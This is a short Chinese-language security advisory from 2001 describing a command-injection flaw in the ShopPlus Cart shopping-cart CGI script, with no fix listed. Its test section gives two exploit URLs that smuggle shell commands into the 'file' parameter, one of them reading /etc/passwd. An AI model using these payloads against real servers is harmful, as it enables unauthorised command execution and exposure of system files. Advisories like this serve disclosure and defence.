ShopPlus Cart 存在任意文件可查看漏洞发布时间:2001-09-06 更新时间:2001-09-06 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 ShopPlus Cart详细描述 ShopPlus Cart 系统是一种电子商务系统,可用来在Internet上进行商品电子交易,其中一CGI脚本没有很好检查符号,远程用户可以在系统上执行任意命令。 测试代码 host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid| host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 解决方案 尚无 相关信息 secure@punkass.com [kernel|x|] alph4num3ric@crackdealer.com [aLph4Num3ric] |
